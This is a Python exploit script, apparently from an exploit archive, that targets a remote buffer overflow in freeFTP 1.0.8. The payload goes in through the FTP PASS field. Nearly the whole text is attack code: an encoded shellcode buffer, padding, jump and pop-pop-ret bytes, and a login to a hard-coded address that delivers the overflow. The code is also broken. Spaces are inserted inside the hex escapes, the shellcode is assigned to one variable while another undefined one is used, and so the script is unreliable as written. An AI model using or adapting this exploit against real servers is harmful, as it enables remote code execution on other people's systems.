freeFTP1.0.8-'PASS'远程缓冲区溢出 # Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow
# Date: 2019-09-01
# Author: Chet Manly
# Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10047242.html
# Version: 1.0.8
# CVE: N/A
from ftplib import FTP
buf = ""
buf += "\x89 \xe1 \xdb \xdf \xd9 \x71 \xf4 \x5e \x56 \x59 \x49 \x49 \x49 "
buf += "\x49 \x49 \x49 \x49 \x49 \x49 \x49 \x43 \x43 \x43 \x43 \x43 \x43 "
buf += "\x37 \x51 \x5a \x6a \x41 \x58 \x50 \x30 \x41 \x30 \x41 \x6b \x41 "
buf += "\x41 \x51 \x32 \x41 \x42 \x32 \x42 \x42 \x30 \x42 \x42 \x41 \x42 "
buf += "\x58 \x50 \x38 \x41 \x42 \x75 \x4a \x49 \x69 \x6c \x48 \x68 \x6d "
buf += "\x52 \x57 \x70 \x75 \x50 \x63 \x30 \x51 \x70 \x6c \x49 \x38 \x65 "
buf += "\x64 \x71 \x79 \x50 \x31 \x74 \x6e \x6b \x52 \x70 \x44 \x70 \x4e "
buf += "\x6b \x66 \x32 \x44 \x4c \x6c \x4b \x30 \x52 \x57 \x64 \x4c \x4b "
buf += "\x43 \x42 \x64 \x68 \x36 \x6f \x58 \x37 \x32 \x6a \x55 \x76 \x36 "
buf += "\x51 \x79 \x6f \x6c \x6c \x77 \x4c \x61 \x71 \x43 \x4c \x63 \x32 "
buf += "\x56 \x4c \x47 \x50 \x6b \x71 \x5a \x6f \x34 \x4d \x45 \x51 \x6f "
buf += "\x37 \x68 \x62 \x6a \x52 \x76 \x32 \x70 \x57 \x4c \x4b \x73 \x62 "
buf += "\x44 \x50 \x4c \x4b \x72 \x6a \x77 \x4c \x6c \x4b \x72 \x6c \x57 "
buf += "\x61 \x52 \x58 \x49 \x73 \x47 \x38 \x33 \x31 \x68 \x51 \x66 \x31 "
buf += "\x6c \x4b \x31 \x49 \x55 \x70 \x47 \x71 \x69 \x43 \x6c \x4b \x72 "
buf += "\x69 \x32 \x38 \x39 \x73 \x64 \x7a \x63 \x79 \x4c \x4b \x37 \x44 "
buf += "\x6c \x4b \x66 \x61 \x4a \x76 \x35 \x61 \x39 \x6f \x6c \x6c \x6f "
buf += "\x31 \x68 \x4f \x54 \x4d \x33 \x31 \x78 \x47 \x35 \x68 \x49 \x70 "
buf += "\x30 \x75 \x49 \x66 \x45 \x53 \x51 \x6d \x49 \x68 \x37 \x4b \x73 "
buf += "\x4d \x61 \x34 \x71 \x65 \x6d \x34 \x36 \x38 \x4c \x4b \x32 \x78 "
buf += "\x65 \x74 \x66 \x61 \x6a \x73 \x65 \x36 \x4c \x4b \x74 \x4c \x30 "
buf += "\x4b \x4c \x4b \x51 \x48 \x57 \x6c \x75 \x51 \x6a \x73 \x6c \x4b "
buf += "\x53 \x34 \x6e \x6b \x43 \x31 \x4a \x70 \x4d \x59 \x53 \x74 \x66 "
buf += "\x44 \x55 \x74 \x53 \x6b \x31 \x4b \x63 \x51 \x36 \x39 \x62 \x7a "
buf += "\x62 \x71 \x69 \x6f \x6d \x30 \x71 \x4f \x51 \x4f \x71 \x4a \x4e "
buf += "\x6b \x62 \x32 \x6a \x4b \x6e \x6d \x53 \x6d \x70 \x6a \x47 \x71 "
buf += "\x4c \x4d \x4e \x65 \x4c \x72 \x53 \x30 \x65 \x50 \x47 \x70 \x66 "
buf += "\x30 \x30 \x68 \x65 \x61 \x4c \x4b \x32 \x4f \x4c \x47 \x6b \x4f "
buf += "\x69 \x45 \x4d \x6b \x6c \x30 \x48 \x35 \x4e \x42 \x71 \x46 \x52 "
buf += "\x48 \x59 \x36 \x4a \x35 \x4d \x6d \x6d \x4d \x79 \x6f \x38 \x55 "
buf += "\x47 \x4c \x33 \x36 \x53 \x4c \x56 \x6a \x6f \x70 \x49 \x6b \x6b "
buf += "\x50 \x73 \x45 \x37 \x75 \x6d \x6b \x31 \x57 \x46 \x73 \x63 \x42 "
buf += "\x72 \x4f \x43 \x5a \x45 \x50 \x56 \x33 \x4b \x4f \x48 \x55 \x55 "
buf += "\x33 \x35 \x31 \x32 \x4c \x53 \x53 \x66 \x4e \x55 \x35 \x72 \x58 "
buf += "\x45 \x35 \x53 \x30 \x41 \x41 "
buf = 'A' * 276
buf += '\x90 ' * 10
buf += shellcode
buf += 'B' * (486 - len (shellcode ))
buf += '\x58 ' # pop eax
buf += '\xfe \xcc ' # dec ah
buf += '\xfe \xcc ' # dec ah
buf += '\xff \xe0 ' # jmp eax
buf += 'C' * 4
buf += '\xe8 \xf0 \xff \xff \xff ' # call near
buf += 'D' * 9
buf += '\xeb \xf0 \x90 \x90 ' # jump backwards
buf += '\xc0 \x3d \x42 \x00 ' # 0x00423dc0 - pop, pop, ret
buf += 'E' * (1000 - len (buf ))
ftp = FTP ()
ftp .connect ('192.168.1.1' , 21 )
ftp .login ('anonymous' , buf )